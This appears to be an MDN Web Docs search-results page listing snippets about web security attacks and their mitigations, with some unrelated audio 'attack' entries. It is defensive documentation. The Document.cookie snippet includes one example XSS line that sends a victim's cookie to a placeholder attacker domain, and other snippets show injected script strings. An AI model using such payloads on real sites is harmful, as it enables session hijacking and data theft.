Types of attacks - Web security
This article describes various types of security attacks and techniques to mitigate them.
...(Click-jacking is sometimes called "user interface redressing", though this is a misuse of the term "redress".) Cross-site request forgery (CSRF). Cross-site scripting (XSS). Cross-site scripting (XSS) is a security exploit which allows an attacker to inject into a website malicious client-side code.
... This code is executed by the victims and lets the attackers bypass access controls and impersonate users.
DoS attack - MDN Web Docs Glossary: Definitions of Web-related terms
DoS (Denial of Service) is a network attack that prevents legitimate use of server resources by flooding the server with requests.
...A DoS attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... There are also Distributed Denial of Service (DDoS) attacks in which a multitude of servers are used to exhaust the computing capacity of an attacked computer.
DynamicsCompressorNode.attack - Web APIs
The attack property of the DynamicsCompressorNode interface is a k-rate AudioParam representing the amount of time, in seconds, required to reduce the gain by 10 dB.
... The attack property's default value is 0.003 and it can be set between 0 and 1.
... Syntax: var audioCtx = new AudioContext(); var compressor = audioCtx.createDynamicsCompressor(); compressor.attack.value = 0; Value: an AudioParam.
Website security - Learn web development
This introductory article won't make you a website security guru, but it will help you understand where threats come from, and what you can do to harden your web application against the most common attacks.
...With great regularity, we hear about websites becoming unavailable due to denial of service attacks, or displaying modified (and often damaging) information on their homepages.
... The purpose of website security is to prevent these (or any) sorts of attacks.
Index - MDN Web Docs Glossary: Definitions of Web-related terms
CSP (Glossary, HTTP, Infrastructure): A CSP (Content Security Policy) is used to detect and mitigate certain types of website related attacks like XSS and data injections.
... CSRF (Glossary, Security): CSRF (Cross-Site Request Forgery) is an attack that impersonates a trusted user and sends a website unwanted commands.
...Challenge-response protocols are one way to fight against replay attacks where an attacker listens to the previous messages and resends them at a later time to get the same credentials as the original message.
HTTP Index - HTTP
Content Security Policy (CSP) (CSP, Content Security Policy, Reference, Security): Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.
... These attacks are used for everything from data theft to site defacement to distribution of malware.
...This serves as an additional layer of protection above and beyond the same-origin policy which can mitigate speculative side channel attacks as well as cross-site script inclusion attacks.
Mixed content - Web security
When a user visits a page served over HTTPS, their connection with the web server is encrypted with TLS and is therefore safeguarded from most sniffers and man-in-the-middle attacks.
...Pages like this are only partially encrypted, leaving the unencrypted content accessible to sniffers and man-in-the-middle attackers.
...The difference lies in the threat level of the worst case scenario if content is rewritten as part of a man-in-the-middle attack.
Subdomain takeovers - Web security
A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain.
...An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it.
... If an attacker can do this, they can potentially read cookies set from the main domain, perform cross-site scripting, or circumvent content security policies, thereby enabling them to capture protected information (including logins) or send malicious content to unsuspecting users.
Distributed Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
A Distributed Denial-of-Service (DDoS) is an attack in which many compromised systems are made to attack a single target, in order to swamp server resources and block legitimate users.
... Normally many persons, using many bots, attack high-profile web servers like banks or credit-card payment gateways.
... In a typical DDoS attack, the assailant begins by exploiting a vulnerability in one computer system and making it the DDoS master.
sslfnc.html
SSL_ROLLBACK_DETECTION disables detection of a rollback attack.
...You must turn this option off to interoperate with TLS clients (such as certain versions of Microsoft Internet Explorer) that do not conform to the TLS specification regarding rollback attacks.
... Important: turning this option off means that your code will not comply with the TLS 3.1 and SSL 3.0 specifications regarding rollback attack and will therefore be vulnerable to this form of attack.
Web security
The web security-oriented articles listed here provide information that may help you secure your site and its code from attacks and data theft.
... Content security: Content Security Policy (CSP). Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks.
... These attacks are used for everything from data theft to site defacement to the distribution of malware.
Content Security Policy (CSP) - HTTP
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.
... These attacks are used for everything from data theft to site defacement to distribution of malware.
...f the X-Content-Security-Policy header, but that's an older version and you don't need to specify it anymore.) Alternatively, the <meta> element can be used to configure a policy, for example: <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"> Threats: Mitigating cross site scripting. A primary goal of CSP is to mitigate and report XSS attacks.
From object to iframe — other embedding technologies - Learn web development
Browser makers and web developers have learned the hard way that iframes are a common target (official term: attack vector) for bad people on the web (often termed hackers, or more accurately, crackers) to attack if they are trying to maliciously modify your webpage, or trick people into doing something they don't want to do, such as reveal sensitive information like usernames and passwords.
... Clickjacking is one kind of common iframe attack where hackers embed an invisible iframe into your document (or embed your document into their own malicious website) and use it to capture users' interactions.
... Always use the sandbox attribute: you want to give attackers as little power as you can to do bad things on your website, therefore you should give embedded content only the permissions needed for doing its job.
Using HTTP cookies - HTTP
This technique helps prevent session fixation attacks, where a third party can reuse a user's session.
... A cookie with the Secure attribute is sent to the server only with an encrypted request over the HTTPS protocol, never with unsecured HTTP, and therefore can't easily be accessed by a man-in-the-middle attacker.
...This precaution helps mitigate cross-site scripting (XSS) attacks.
Threats - Archive of obsolete content
Threats may involve intentional actors (e.g., an attacker who wants to access information on a server) or unintentional actors (e.g., an administrator who forgets to disable user accounts of a former employee). Threats can be local, such as a disgruntled employee, or remote, such as an attacker in another geographical area.
... A threat source is the cause of a threat, such as a hostile cyber or physical attack, a human error of omission or commission, a failure of organization-controlled hardware or software, or other failure beyond the control of the organization.
...The attacks often come in the form of instant messages or phishing emails which appear to be legitimate but are used to obtain personal information.
Vulnerabilities - Archive of obsolete content
An example is an input validation error, such as user-provided input not being properly evaluated for malicious character strings and overly long values associated with known attacks.
... Another example is a race condition error that allows the attacker to perform a specific action with elevated privileges.
...An attacker could craft a fraudulent email message that contains hyperlinks that, when rendered in HTML, appear to the recipient to be benign but actually take the recipient to a malicious web site when they are clicked on.
Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
DoS (Denial of Service) is a network attack that prevents legitimate use of server resources by flooding the server with requests.
...A DoS attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... There are also Distributed Denial of Service (DDoS) attacks in which a multitude of servers are used to exhaust the computing capacity of an attacked computer.
NSS 3.14.3 release notes
Notable changes in NSS 3.14.3: CVE-2013-1620. Recent research by Nadhem AlFardan and Kenny Paterson has highlighted a weakness in the handling of CBC padding as used in SSL, TLS, and DTLS that allows an attacker to exploit timing differences in MAC processing.
... The details of their research and the attack can be found at http://www.isg.rhul.ac.uk/tls/, and has been referred to as "Lucky Thirteen".
... NSS 3.14.3 includes changes to the softoken and ssl libraries to address and mitigate these attacks, contributed by Adam Langley of Google.
Advanced techniques: Creating and sequencing audio - Web APIs
Let's say our envelope has attack and release.
... We can allow the user to control these using range inputs on the interface: <label for="attack">Attack</label> <input name="attack" id="attack" type="range" min="0" max="1" value="0.2" step="0.1" /> <label for="release">Release</label> <input name="release" id="release" type="range" min="0" max="1" value="0.5" step="0.1" /> Now we can create some variables over in JavaScript and have them change when the input values are updated: let attackTime = 0.2; const attackControl = document.querySelector('#attack'); attackControl.addEventListener('input', function() { attackTime = Number(this.value); }, false); let releaseTime = 0.5; const releaseControl = document.querySelector('#release'); releaseControl.addEventListener('input', function() { releaseTime = Number(this.value); }, false); ...
... For our attack and release, we'll use the linearRampToValueAtTime method as mentioned above.
X-XSS-Protection - HTTP
The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks.
...If a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).
...Rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.
Securing your site - Web security
Hash passwords using a secure algorithm (OWASP): storing passwords in plain text can lead to attackers knowing and leaking the exact password of your site's users, potentially putting the users at risk.
... Content Security Policy: an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.
... These attacks are used for everything from data theft to site defacement or distribution of malware.
Security Controls - Archive of obsolete content
For example, if a system has a known vulnerability that attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...Limiting functionality and resolving security weaknesses have a common goal: give attackers as few opportunities as possible to breach a system.
...Think of phishing attacks.
... For example, sensitive data on a server may be protected from external attack by several controls, including a network-based firewall, a host-based firewall, and OS patching.
Introduction to SSL - Archive of obsolete content
Although the fourth question is not technically part of the SSL protocol, it is the client's responsibility to support this requirement, which provides some assurance of the server's identity and thus helps protect against a form of security attack known as "man in the middle." An SSL-enabled client goes through these steps to authenticate a server's identity: Is today's date within the validity period?
...Although step 4 is not technically part of the SSL protocol, it provides the only protection against a form of security attack known as "man in the middle." Clients must perform this step and must refuse to authenticate the server or establish a connection if the domain names don't match.
... Man-in-the-middle attack: as suggested in step 4 above, the client application must check the server domain name specified in the server certificate against the actual domain name of the server with which the client is attempting to communicate.
... This step is necessary to protect against a man-in-the-middle attack, which works as follows.
Cross-site scripting - MDN Web Docs Glossary: Definitions of Web-related terms
Cross-site scripting (XSS) is a security exploit which allows an attacker to inject into a website malicious client-side code.
... This code is executed by the victims and lets the attackers bypass access controls and impersonate users.
... These attacks succeed if the web app does not employ enough validation or encoding.
... Learn more. General knowledge: Cross-site scripting (XSS); Cross-site scripting on Wikipedia; Cross-site scripting on OWASP; Another article about Cross-site scripting; XSS attack – exploit & protection ...
Session Hijacking - MDN Web Docs Glossary: Definitions of Web-related terms
Session hijacking occurs when an attacker takes over a valid session between two computers.
... The attacker steals a valid session ID in order to break into the system and snoop data.
...In TCP session hijacking, an attacker gains access by taking over a TCP session between two machines in mid session.
... Session hijacking occurs because of: no account lockout for invalid session IDs; weak session-ID generation algorithm; insecure handling; indefinite session expiration time; short session IDs; transmission in plain text. Session hijacking process: Sniff, that is perform a man-in-the-middle (MITM) attack, place yourself between victim and server.
Phishing: a short definition
This email will usually contain a link pretending to lead to the original service, but in reality, taking the victim to an attacker-controlled website.
... Past and current countermeasures: various technical, and social approaches, exist to combat phishing attacks.
...As most phishing attacks start with unsolicited email messages, a clear starting point is improving spam filters, thus reducing the number of fraudulent messages reaching users.
...This can be phished by an attacker, though with TOTP apps the attacker has limited time to make their unauthorized login.
sslerr.html
If this occurs frequently on a server, an active attack (such as the "million question" attack) may be underway against the server.
...This may indicate that an attack on that server is underway.
...If this occurs frequently on a server, an active attack (such as the "million question" attack) may be underway against the server.
...If encountered repeatedly on a server socket, this can indicate that the server is actively under a "million question" attack.
Lighting a WebXR setting - Web APIs
Decoupling orientation from lighting: in an AR application that uses geolocation to determine orientation and potentially position information, avoiding having that information directly correlate to the state of the lighting is another way browsers can protect users from fingerprinting attacks.
... Temporal and spatial filtering: consider an attack that uses a building's automated lighting system to flash the lights on and off quickly in a known pattern.
...This could be done remotely, or it could be performed by an attacker who's located in the same room but wants to determine if the other person is also in the same room.
... The lighting estimation API specification mandates that all user agents perform temporal and spatial filtering to fuzz the data in a manner that reduces its usefulness for the purpose of locating the user or performing side-channel attacks.
Index - HTTP
This helps guard against cross-site scripting attacks (XSS).
... Public-Key-Pins (HPKP, HTTP, Reference, Security, header): The HTTP Public-Key-Pins response header associates a specific cryptographic public key with a certain web server to decrease the risk of MITM attacks with forged certificates.
...Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.
... X-XSS-Protection (HTTP, Reference, Security, XSS, header): The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks.
Index - Archive of obsolete content
For example, if a system has a known vulnerability that attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...Limiting functionality and resolving security weaknesses have a common goal: give attackers as few opportunities as possible to breach a system.
...Threats may involve intentional actors (e.g., an attacker who wants to access information on a server) or unintentional actors (e.g., an administrator who forgets to disable user accounts of a former employee). Threats can be local, such as a disgruntled employee, or remote, such as an attacker in another geographical area.
Confidentiality, Integrity, and Availability - Archive of obsolete content
Now imagine that an attacker can shop on your web site and maliciously alter the prices of your products, so that they can buy anything for whatever price they choose.
...Another example of a failure of integrity is when you try to connect to a website and a malicious attacker between you and the website redirects your traffic to a different website.
...If an attacker is not able to compromise the first two elements of information security (see above) they may try to execute attacks like denial of service that would bring down the server, making the website unavailable to legitimate users due to lack of availability.
Encryption and Decryption - Archive of obsolete content
Manually finding the key to break an algorithm is called a brute force attack.
... The key strength of an algorithm is determined by finding the fastest method to break the algorithm and comparing it to a brute force attack.
...(For more information about RC4 and other ciphers used with SSL, see "Introduction to SSL".) An encryption key is considered full strength if the best known attack to break the key is no faster than a brute force attempt to test every key possibility.
MitM - MDN Web Docs Glossary: Definitions of Web-related terms
A man-in-the-middle attack (MitM) intercepts a communication between two systems.
... In physical mail and in online communication, MitM attacks are tough to defend.
... Learn more. OWASP article: Man-in-the-middle attack. Wikipedia: Man-in-the-middle attack. The Public-Key-Pins header (HPKP) can significantly decrease the risk of MitM by instructing browsers to require a whitelisted certificate for all subsequent connections to that website.
JSAPI User Guide
Unless you also regularly deploy SpiderMonkey security updates, a determined hacker could use publicly known bugs in the engine to attack your application.
... Note that the kind of attack we're talking about here is where a hacker uses JavaScript to attack the C++ code of the engine itself (or your embedding).
... Block simple denial-of-service attacks - a program like while(true){} should not hang your application.
Secure Development Guidelines
...asic registers (EAX, EBX, ECX, EDX, EDI, ESI); 2 stack-related registers (ESP, EBP) mark top and bottom of current stack frame; status register (EFLAGS) contains various state information; instruction pointer (EIP) points to register being executed; can't be modified directly. Introduction: gaining control (2). EIP is modified using call or jump instructions; attacks usually rely on obtaining control over the EIP; otherwise the attacker can try to control memory pointed to by an existing function pointer; a vulnerability is required to modify the EIP or sensitive memory; saved return addr or function pointer get altered. Introduction: gaining control (3). Common issues used to gain control: buffer overflows, format string bugs, integer overflows/...
...ation. Most vulnerabilities are a result of un-validated input; always perform input validation; could save you without knowing it. Examples: if it doesn't have to be negative, store it in an unsigned int; if the input doesn't have to be > 512, cut it off there; if the input should only be [a-zA-Z0-9], enforce it. Cross site scripting (XSS): XSS is a type of code injection attack; typically occurs in web applications; injection of arbitrary data into an HTML document from another site; victim's browser executes those HTML instructions; could be used to steal user credentials; think: webmail, online auction, CMS, online banking...
... to the user. HTML encoding: & → &amp;, < → &lt;, > → &gt;, " → &quot;, ' → &#39;. URL encoding: % encoding. Java/VBScript escaping depends on the context; in a single-quoted string, escaping ' would suffice. SQL injection occurs when un-trusted input is mixed with a SQL string; SQL is a language used to interact with databases; code injection attack that is similar to XSS but targeted at SQL rather than HTML and JavaScript; if input is mixed with SQL, it could itself become an SQL instruction and be used to: query data from the database (passwords); insert value into the database (a user account); change application logic based on results returned by the database. SQL injection: example: snprintf(str, sizeof(str), "...
SubtleCrypto.encrypt() - Web APIs
The Web Crypto API supports three different AES modes: CTR (Counter Mode), CBC (Cipher Block Chaining), GCM (Galois/Counter Mode). It's strongly recommended to use authenticated encryption, which includes checks that the ciphertext has not been modified by an attacker.
... Authentication helps protect against chosen-ciphertext attacks, in which an attacker can ask the system to decrypt arbitrary messages, and use the result to deduce information about the secret key.
... One major difference between this mode and the others is that GCM is an "authenticated" mode, which means that it includes checks that the ciphertext has not been modified by an attacker.
Strict-Transport-Security - HTTP
This creates an opportunity for a man-in-the-middle attack.
... Note: the Strict-Transport-Security header is ignored by the browser when your site is accessed using HTTP; this is because an attacker may intercept HTTP connections and inject the header or remove it.
... Strict Transport Security resolves this problem; as long as you've accessed your bank's web site once using HTTPS, and the bank's web site uses Strict Transport Security, your browser will know to automatically use only HTTPS, which prevents hackers from performing this sort of man-in-the-middle attack.
Planned changes to shared memory - JavaScript
These changes provide further isolation between sites and help reduce the impact of attacks with high-resolution timers, which can be created with shared memory.
... For top-level documents, two headers will need to be set: Cross-Origin-Opener-Policy with same-origin as value (protects your origin from attackers); Cross-Origin-Embedder-Policy with require-corp as value (protects victims from your origin). With these two headers set, postMessage() will no longer throw for SharedArrayBuffer objects and shared memory across threads is therefore available.
...Note that setting the Cross-Origin-Resource-Policy header to any other value than same-origin opens up the resource to potential attacks, such as Spectre.
Privacy, permissions, and information security
Modern browsers take steps to help prevent fingerprinting-based attacks by either not allowing information to be accessed or, where the information must be made available, by introducing variations that prevent it from being used for identification purposes.
... Certificate Transparency: an open standard for monitoring and auditing certificates, creating a database of public logs that can be used to help identify incorrect or malicious certificates. Content Security Policy: provides the ability to define the extent to which a document's content can be accessed by other devices over the web; used in particular to prevent or mitigate attacks on the server. Feature Policy: lets web developers selectively enable, disable, and modify the behavior of certain features and APIs both for a document and for subdocuments loaded in <iframe>s. <iframe>'s allow attribute: technically part of Feature Policy, the allow attribute on an <iframe> specifies which web features the document in the frame should be allowed to access ...
... HTTP Public Key Pinning (HPKP): HPKP is used by servers to instruct a client to associate a specific public key with the server going forward in order to decrease the likelihood of man-in-the-middle attacks. HTTP Strict Transport Security (HSTS): HSTS is used by servers to let them protect themselves from protocol downgrade and cookie hijack attacks by letting sites tell clients that they can only use HTTPS to communicate with the server. HTTP/2: while HTTP/2 technically does not have to use encryption, most browser developers are only supporting it when used with HTTPS, so it can be thought of in that regard as being security-related. Permissions API: provides a way to determine the status of permissions for the current browser context. Transport ...
Insecure passwords - Web security
Serving login forms over HTTP is especially dangerous because of the wide variety of attacks that can be used against them to extract a user's password.
...Websites that handle user data should use HTTPS to protect their users from attackers.
...Attackers are getting smarter; they steal username/password pairs from one site and then try reusing them on more lucrative sites.
Appendix C: Avoiding using eval in Add-ons - Archive of obsolete content
If using an unencrypted, insecure connection, a man-in-the-middle attacker might replace the JSON with attack code before it arrives at the user.
...setTimeout("alert('" + xhr.responseText + "');", 100); // attacker manipulated responseText to contain "attack!'); format_computer(); alert('done" setTimeout("alert('attack!'); format_computer(); alert('done');", 100); As a general rule of thumb, just don't pass code around as strings and execute it by calling eval, setTimeout and friends.
MDN Web Docs Glossary: Definitions of Web-related terms
Descriptor (CSS), Deserialization, Developer Tools, DHTML, Digest, Digital certificate, Distributed Denial of Service, DMZ, DNS, Doctype, Document directive, Document environment, DOM (Document Object Model), Domain, Domain name, Domain sharding, Dominator, DoS attack, DTLS (Datagram Transport Layer Security), DTMF (Dual-Tone Multi-Frequency signaling), Dynamic programming language, Dynamic typing; E: ECMA, ECMAScript, Effective connection type, Element, Empty element, Encapsulation, Encryption, Endianness, Engine, Entity, Enti...
...WebP, WebRTC, WebSockets, WebVTT, WHATWG, Whitespace, World Wide Web, Wrapper; X: XForms, XHR (XMLHttpRequest), XHTML, XInclude, XLink, XML, XPath, XQuery, XSLT; Other: 404, 502, ALPN, At-rule, Attack, Byte-Order Mark, Character set, Client, Cryptosystem, Debug, Digital signature, Execution, Flex-direction, GLSL, Interface, Library, Memory management, Routers, Self-Executing Anonymous Function, Stylesheet, Vector image ...
Sending form data - Learn web development
HTML forms are by far the most common server attack vectors (places where attacks can occur).
... The Website security article of our server-side learning topic discusses a number of common attacks and potential defences against them in detail.
Mozilla Port Blocking
Background: on 08/15/2001, CERT issued a vulnerability note VU#476267 for a "cross-protocol" scripting attack, known as the HTML Form Protocol Attack which allowed sending arbitrary data to most TCP ports.
... A simple exploit of this hole allows an attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.
An overview of NSS Internals
Often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for attackers to extract keys from a memory dump.
...As soon as you set a master password, an attacker stealing your key database will no longer be able to get access to your private key, unless the attacker would also succeed in stealing the master password.
Index
Often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for attackers to extract keys from a memory dump.
...As soon as you set a master password, an attacker stealing your key database will no longer be able to get access to your private key, unless the attacker would also succeed in stealing the master password.
NSS 3.19.2.1 release notes
An attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...This may allow attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.19.4 release notes
An attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...This may allow attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.20.1 release notes
An attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...This may allow attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.24 release notes
Update NSS to protect it against the CacheBleed attack.
... Bugs fixed in NSS 3.24: this Bugzilla query returns all the bugs fixed in NSS 3.24: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advanced&product=nss&target_milestone=3.24 Acknowledgements: the NSS development team would like to thank Yuval Yarom for responsibly disclosing the CacheBleed attack by providing advance copies of their research.
JS::CompileOptions
This allows an attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... To counter this attack, HTML5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.
JSErrorReport
this allows an attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.
Handling Mozilla Security Bugs
background security vulnerabilities are different from other bugs, because their consequences are potentially so severe: users' private information (including financial information) could be exposed, users' data could be destroyed, and users' systems could be used as platforms for attacks on other systems.
...we understand and acknowledge the concerns of those who believe that too-hasty disclosure of exploit details can provide a short-term advantage to potential attackers, who can exploit a problem before most end users become aware of its existence.
Xray vision
if chrome-privileged code is compromised, the attacker can take over the user's computer.
...so this is not a straightforward privilege escalation attack, although it might lead to one if the chrome code is sufficiently confused.
Mozilla
mozilla port blocking on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting attack, known as the html form protocol attack which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.
DOMHighResTimeStamp - Web APIs
also note the section below on reduced time precision controlled by browser preferences to avoid timing attacks and fingerprinting.
... reduced time precision to offer protection against timing attacks and fingerprinting, the precision of time stamps might get rounded depending on browser settings.
Document.cookie - Web APIs
this is sufficient for user tracking, but it will prevent many csrf attacks.
...common ways to steal cookies include using social engineering or by exploiting an xss vulnerability in the application - (new image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie; the httponly cookie attribute can help to mitigate this attack by preventing access to cookie value through javascript.
DynamicsCompressorNode - Web APIs
dynamicscompressornode.attack read only is a k-rate audioparam representing the amount of time, in seconds, required to reduce the gain by 10 db.
... a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
Element.innerHTML - Web APIs
there is potential for this to become an attack vector on a site, creating a potential security risk.
... name = "<script>alert('i am john in an annoying alert!')</script>"; el.innerhtml = name; // harmless in this case although this may look like a cross-site scripting attack, the result is harmless.
Index - Web APIs
1057 dynamicscompressornode() audio, constructor, dynamicscompressornode, media, web audio api the dynamicscompressornode() constructor creates a new dynamicscompressornode object which provides a compression effect, which lowers the volume of the loudest parts of the signal 1058 dynamicscompressornode.attack api, attack, dynamicscompressornode, property, reference, web audio api an audioparam.
...although the window.crypto property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to attack by polyfill.
performance.now() - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of performance.now() might get rounded depending on browser settings.
...coop process-isolates your document and potential attackers can't access to your global object if they were opening it in a popup, preventing a set of cross-origin attacks dubbed xs-leaks.
window.postMessage() - Web APIs
shared memory is gated behind two http headers: cross-origin-opener-policy with same-origin as value (protects your origin from attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...
...this cannot be overstated: failure to check the origin and possibly source properties enables cross-site scripting attacks.
Set-Cookie - HTTP
this mitigates attacks against cross-site scripting (xss).
... asserts that a cookie must not be sent with cross-origin requests, providing some protection against cross-site request forgery attacks (csrf).
HTTP headers - HTTP
x-download-options the x-download-options http header indicates that the browser (internet explorer) should not display the option to "open" a file that has been downloaded from an application, to prevent phishing attacks as the file otherwise would gain access to execute in the context of the application.
... public-key-pins associates a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
HTTP Public Key Pinning (HPKP) - HTTP
http public key pinning (hpkp) was a security feature that used to tell a web client to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
...if an attacker is able to compromise a single ca, they can perform mitm attacks on various tls connections.
Secure contexts - Web security
the primary goal of secure contexts is to prevent mitm attackers from accessing powerful apis that could further compromise the victim of an attack.
... some apis on the web are very powerful, giving an attacker the ability to do the following and more: invade a user's privacy.
Subresource Integrity - Web security
however, using cdns also comes with a risk, in that if an attacker gains control of a cdn, the attacker can inject arbitrary malicious content into files on the cdn (or replace the files completely) and thus can also potentially attack all sites that fetch files from that cdn.
... subresource integrity enables you to mitigate some risks of attacks such as this, by ensuring that the files your web application or web document fetches (from a cdn or anywhere) have been delivered without a third-party having injected any additional content into those files — and without any other changes of any kind at all having been made to those files.
Transport Layer Security - Web security
though the performance gains from 0-rtt can be significant, they come with some risk of replay attack, so some care is needed before enabling this feature.
...enabling 0-rtt requires additional steps, both to ensure successful deployment and to manage the risks of replay attacks.
Weak signature algorithms - Web security
weaknesses in hash algorithms can lead to situations in which attackers can create or obtain fraudulent certificates.
... as new attacks are found and improvements in available technology make attacks more feasible, the use of older algorithms is discouraged and support for them is eventually removed.
Security best practices in extensions - Archive of obsolete content
non-chrome urls in chrome xul or html such as the following example are not allowed: <script type="text/javascript" src="http://mysite.greatsite.com/js/wow-content.js" /> in general, scripts that are from remote sources that run in the chrome context are not acceptable, as many times the source of the script can never be 100% guaranteed, and they are vulnerable to man-in-the-middle attacks.
XUL Questions and Answers - Archive of obsolete content
support for non-rdf datasources for xul template is planned (bug 321170): xml datasources (bug 321171) storage (sqlite) datasources (bug 321172) when loading an xslt stylesheet into an xml i get the error: "error loading stylesheet: an xslt stylesheet load was blocked for security reasons." that error is from a security check that has been put up to safeguard against cross-site-scripting attacks.
Introduction to Public-Key Cryptography - Archive of obsolete content
for an overview of ssl, see "introduction to ssl." for an overview of encryption and decryption, see "encryption and decryption." information on digital signatures is available from "digital signatures." public-key cryptography is a set of well-established techniques and standards for protecting communications from eavesdropping, tampering, and impersonation attacks.
Cryptographic hash function - MDN Web Docs Glossary: Definitions of Web-related terms
tible (each digest could come from a very large number of messages, and only brute-force can generate a message that leads to a given digest) tamper-resistant (any change to a message leads to a different digest) collision-resistant (it should be impossible to find two different messages that produce the same digest) cryptographic hash functions such as md5 and sha-1 are considered broken, as attacks have been found that significantly reduce their collision resistance.
Placeholder names - MDN Web Docs Glossary: Definitions of Web-related terms
placeholder names are commonly used in cryptography to indicate the participants in a conversation, without resorting to terminology such as "party a," "eavesdropper," and "malicious attacker." the most commonly used names are: alice and bob, two parties who want to send messages to each other, occasionally joined by carol, a third participant eve, a passive attacker who is eavesdropping on alice and bob's conversation mallory, an active attacker ("man-in-the-middle") who is able to modify their conversation and replay old messages ...
Experimental features in Firefox
nightly 81 yes developer edition — — beta — — release — — preference name — security and privacy block plain text requests from flash on encrypted pages in order to help mitigate man-in-the-middle (mitm) attacks caused by flash content on encrypted pages, a preference has been added to treat object_subrequests as active content.
Script security
if the code is compromised, the attacker can take over the user's computer.
Localization content best practices
example: this web page at <span id='malware_sitename'/> has been reported as an attack page and has been blocked based on your security preferences.
Gecko Profiler FAQ
you’ll probably want to accumulate costs that are somehow “similar” or “in the same bucket” but distributed over different parts of the call tree / time line, and then attack the biggest bucket.
NSS FAQ
it contains bugs that were never fixed, doesn't support tls or the new 56-bit export cipher suites, and does not contain the fix to the bleichenbacher attack on pkcs#1.
NSS 3.12.5 release_notes
bug 525056: timing attack against ssl3ext.c:ssl3_serverhandlesessionticketxtn() bug 526689: ssl3 & tls renegotiation vulnerability documentation for a list of the primary nss documentation pages on mozilla.org, see nss documentation.
NSS 3.19.2.3 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.21.1 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.22.2 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.23 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.36.6 release notes
this is a patch release to fix cve-2018-12404 bugs fixed in nss 3.36.6 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) bug 1389967 and bug 1448748 - fixes for mingw on x64 platforms.
NSS 3.40.1 release notes
this is a patch release to fix cve-2018-12404 new functions none bugs fixed in nss 3.40.1 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) compatibility nss 3.40.1 shared libraries are backward compatible with all older nss 3.x shared libraries.
NSS 3.41 release notes
